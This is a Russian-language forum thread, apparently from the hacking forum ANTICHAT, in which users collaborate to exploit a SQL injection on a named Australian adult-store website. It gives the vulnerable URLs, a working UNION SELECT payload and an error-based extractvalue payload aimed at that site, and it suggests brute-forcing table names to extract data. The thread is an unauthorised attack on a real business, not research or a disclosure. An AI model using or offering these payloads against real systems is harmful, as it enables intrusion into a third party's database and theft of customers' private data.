ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
10.11.2015, 18:41
|
|
Познающий
Регистрация: 17.08.2015
Сообщений: 96
Провел на форуме:
32618
Репутация:
1
|
|
Всем привет!
Никак не могу расковырять автралийский сексшоп)) с такой вот скулей:
Код:
http://www.discretionadultstore.com.au/evolved-bendable-you-too-p-99.html?bPath=1_2&cPath=1'
Вручную испробовал уже все известные и неизвестные мне методы. Плюс, как я понял, там вообще нет information_shema. Все, что определил, так это количество полей - 6 и название DB - discr_data.
Всякие Havij и sqlmap ничего не дали.
Плюс здесь вроде HPP
Код:
http://www.discretionadultstore.com.au/dvds-c-37.html?pto=20&pto=_BLA_BLA_BLA_&pfrom=0&page=2&ppp=60&n958468=v913722
, где pto= - уязвимый параметр (по последнему значению)
В оригинале было вроде что-то типа:
Код:
.../dvds-c-37%26n958468%3Dv913722.html?.....
Тоже ноги не смог приделать))
Кто поможет справится? |
|
|
10.11.2015, 19:36
|
|
Новичок
Регистрация: 29.08.2013
Сообщений: 7
Провел на форуме:
1814
Репутация:
8
|
|
Сообщение от ubepkr
↑
Всем привет!
Никак не могу расковырять автралийский сексшоп)) с такой вот скулей:
Код:
http://www.discretionadultstore.com.au/evolved-bendable-you-too-p-99.html?bPath=1_2&cPath=1'
Вручную испробовал уже все известные и неизвестные мне методы. Плюс, как я понял, там вообще нет information_shema. Все, что определил, так это количество полей - 6 и название DB - discr_data.
Всякие Havij и sqlmap ничего не дали.
Плюс здесь вроде HPP
Код:
http://www.discretionadultstore.com.au/dvds-c-37.html?pto=20&pto=_BLA_BLA_BLA_&pfrom=0&page=2&ppp=60&n958468=v913722
, где pto= - уязвимый параметр (по последнему значению)
В оригинале было вроде что-то типа:
Код:
.../dvds-c-37%26n958468%3Dv913722.html?.....
Тоже ноги не смог приделать))
Кто поможет справится?
Код:
http://www.discretionadultstore.com.au/evolved-bendable-you-too-p-99.html?bPath=1_2&cPath=-1+union+select+version(),12222,311111,411111,511111,611111-- -
атрибут alt главного логотипа сайта будет содержать версию ну и далее по аналогии, если не понятно, то переходишь по этой ссылке, открываешь исходный код страницы и ищешь версию ну и крутишь себе дальше, в чём сложность?
|
|
|
|
10.11.2015, 19:39
|
|
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
Провел на форуме:
179197
Репутация:
25
|
|
Сообщение от nopony
↑
Код:
http://www.discretionadultstore.com.au/evolved-bendable-you-too-p-99.html?bPath=1_2&cPath=-1+union+select+version(),12222,311111,411111,511111,611111-- -
атрибут alt главного логотипа сайта будет содержать версию ну и далее по аналогии, если не понятно, то переходишь по этой ссылке, открываешь исходный код страницы и ищешь версию ну и крутишь себе дальше, в чём сложность?
Проблема в считывании названий таблиц, как я понял.
Error based так то тоже выводит
http://www.discretionadultstore.com...tValue(1,concat(0x3 a,(select(version())))))=1
|
|
|
|
10.11.2015, 19:51
|
|
Новичок
Регистрация: 29.08.2013
Сообщений: 7
Провел на форуме:
1814
Репутация:
8
|
|
Понял. Судя по всему url парситься гдет внутри по символу "_" так что его использовать нельзя, значит нужно брутить таблицы на имена, не содержащие в себе "_" и молиться, чтоб и имена полей(их тоже брутить) тоже не содержали этот символ
|
|
|
|
10.11.2015, 21:03
|
|
Познающий
Регистрация: 17.08.2015
Сообщений: 96
Провел на форуме:
32618
Репутация:
1
|
|
Сообщение от nopony
↑
атрибут alt главного логотипа сайта будет содержать версию ну и далее по аналогии, если не понятно, то переходишь по этой ссылке, открываешь исходный код страницы и ищешь версию ну и крутишь себе дальше, в чём сложность?
дык это понятно, но мало что дает. Сложность именно в
Сообщение от Br@!ns
↑
считывании названий таблиц
Если только брутить, то это грустно... прогнал на часто встречающиеся имена (штук 500), все мимо.
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
